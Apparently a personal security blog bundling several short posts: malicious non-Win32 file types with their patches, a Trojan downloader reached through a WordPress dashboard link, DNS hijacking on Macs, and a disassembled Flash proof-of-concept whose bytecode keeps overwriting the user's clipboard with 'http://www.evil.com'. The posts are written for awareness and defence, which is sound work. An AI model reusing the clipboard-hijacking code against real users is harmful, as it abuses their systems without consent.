iThreats

As grand finals kick off, today is the most spectacular moment for Aussies sporting event.

I love underdogs, Go Hawks!

After 5 hours:

Hawks won! If you know the story behind this game, it’s indeed mission impossible for Hawthorn Hawks to beat Geelong Cats, but it was amazing they won by 26 points (115/89).  Life is full of surprises!

[Read Real Footy]

Good thing, there’s NO malware relating to this event!(“,)

There are heaps of Non-Win32 malicious file currently in the wild. These files are crafted to allow attackers to remotely execute arbitrary code.  Although, it exploits known vulnerabilities, but still attackers find it useful as most of us do not bother applying security updates. So, the effect is massive installation of various threats in your computer.

FileType: SWF
Solution: Flash Player Update

FileType: RIFF Windows Animated Cursor
Solution: Microsoft Security Bulletin MS07-017

FileType: PDF
Solution: Adobe Reader and Acrobat Security Update

FileType: RAR
Solution: Update to latest version (version 3.61 and onwards)

Other non-exploited files:

FileType: DOC, Excel, PPT, JPEG, CHM
Behaviour: Drops and Install malicious EXE file

Filetype: ASF (Windows Audio/Video Files)
Behaviour: Connects to remote IP address to download malicious EXE file

For these kind of files, please make sure its coming from trusted source and make sure you have security software with updated signature installed.

Related Post:
- Inside Exploited PDF
- ASF File Specification & Recent Threats
- Malicious CHM

We still feel the cold weather here in Melbourne, but Google just reminded me that it’s already Spring!

I found this in my (wordpress) dashboard at the lower right …

Once you click the link, it will create the following traffic in background …

Good thing, there was no DMG file for Mac OS X, instead it tries to download EXE file for unfortunate innocent Windows users. The file free.porn.movie.exe is a Trojan downloader.

After few hours, WordPress responded to these malicious activity…

Stay informed!

Notice, “Oprah Winfrey’s Death”…

It’s been all over the internet, but definitely coming from unreliable source. It’s just a sick hoax!

For sure people started searching and verifying this information online but be careful from dodgy websites! You might bump to a drive by download servers.

As mentioned in my previous post, there has been a report about browser hijacking. However, as days goes by more and more Mac OS X users shares the same experience.

Unfortunately, this site serves unwanted pop-ups (Ads) although no malwares yet found.

So what’s happening here ?

1st of June, MozillaZine Forum user reported this incident and found his DNS search domain was set to “mygateway.net”. From the thread, they suspected that it was coming from the ISP (Rogers Cable).

A month after, another MozillaZine Forum user feels that the issue covers 3 possible source: 1) Zlob DNSChanger 2) DNS hijacking caused by SMC wireless routers 3) Rogers “service” hijacking URL searches

As more and more user experiencing this issue, I wonder if this is indeed related to Zlob’s DNSChanger. Unless someone can provide a DMG or URL for analysis, we can’t conclude this incident as new DNSChanger related activity.

Thank God, I’m back …

So, the SWF PoC (proof-of-concept) Clipboard hijacking works in cross-platform (Windows and Mac browser). The sneaky behavior does not exploit any vulnerability instead it uses a legitimate ActionScript as mentioned in my previous post.  Basically, if you refer SWF File Format Specification 9 – SWF 9 introduced ActionScript 3.0 with new DoABC (Do ActionScript Byte Code)  action-definition tags. Like DoAction tags, DoABC defines a series of bytecode to be executed. However, this time DoABC tag run in ActionScript 3.0 virtual machines [For further reading -> VM2 Overview].

From the PoC that was published…

// Defining the symbolclass "test_fla.MainTimeline" into the package
[052]       515 DOABC
class [package]test_fla:MainTimeline extends [package]flash.display:MovieClip, test_fla:MainTimeline, flags=08

{ // test_fla:frame1

constructor ---- [package]test_fla:MainTimeline()
[3 1 10 11 0]
{
getlocal_0
pushscope
getlocal_0
constructsuper 0 params
findpropstrict [package]:addFrameScript
pushbyte 00
getlex [packageinternal]test_fla:frame1
callpropvoid [package]:addFrameScript, 2 params
returnvoid
} //test_fla:frame1() executes setClip()

method ---- [packageinternal]test_fla:frame1()
[3 1 10 11 0]
{
getlocal_0
pushscope
findpropstrict [package]flash.utils:setInterval
getlex [package]:setClip
pushbyte 01
callpropvoid [package]flash.utils:setInterval, 2 params
returnvoid
}

// setClip() push "http://www.evil.com" users' clipboard
method ---- [package]:setClip()
[2 1 10 11 0]
{
getlocal_0
pushscope
getlex [package]flash.system:System
pushstring "http://www.evil.com"
callpropvoid [package]:setClipboard, 1 params
returnvoid
} }

The interesting part here is not the code, instead the legitimate features and capability that allows it to  cross over boundaries and user systems’ security perimeter making it intrusive, sneaky and potential vector for attackers and malwares.

Should developers must make sure that their processes have their own execution domain?

So, whose fault is this ?